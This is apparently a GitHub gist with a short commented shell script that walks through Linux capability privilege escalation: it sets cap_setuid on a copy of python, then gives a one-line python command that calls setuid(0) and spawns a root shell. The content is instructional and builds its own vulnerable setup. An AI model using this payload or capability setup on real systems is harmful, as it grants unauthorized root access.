Last active
January 16, 2021 20:04
-
-
Save Awan/21d54ebc7d5396c1abcc295b3361c32e to your computer and use it in GitHub Desktop.
A gist explaining linux capability privileges escalations
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # shellcheck disable=2034 | |
| coded_by=' | |
| In the name of Allah, the most Gracious, the most Merciful. | |
| ▓▓▓▓▓▓▓▓▓▓ | |
| ░▓ Author ▓ Abdullah <https://abdullah.today> | |
| ░▓▓▓▓▓▓▓▓▓▓ YouTube <https://YouTube.com/AbdullahToday> | |
| ░░░░░░░░░░ | |
| ' | |
| # A simple script to explain how privileges escaltion works. | |
| # First we will create a new user. | |
| # | |
| # As root, create a new user, set a password | |
| # useradd -m ak | |
| # passwd ak | |
| # Set capabilities on python, (yeah, definitely as root) | |
| # cp /usr/bin/python /tmp/ | |
| # setcap cap_setuid+ep /tmp/python | |
| # Login to new user, add .local/bin to path and copy the vulnerable python | |
| # mkdir ~/.local/bin -p | |
| # export PATH=~/.local/bin/:$PATH | |
| # cp /tmp/python ~/.local/bin/ | |
| # As new user ak, now execute this from shell | |
| # ./~/.local/bin/python -c 'import os;os.setuid(0);os.system("/bin/sh")' | |
| # You will get a root shell. Check by invoking id command. | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment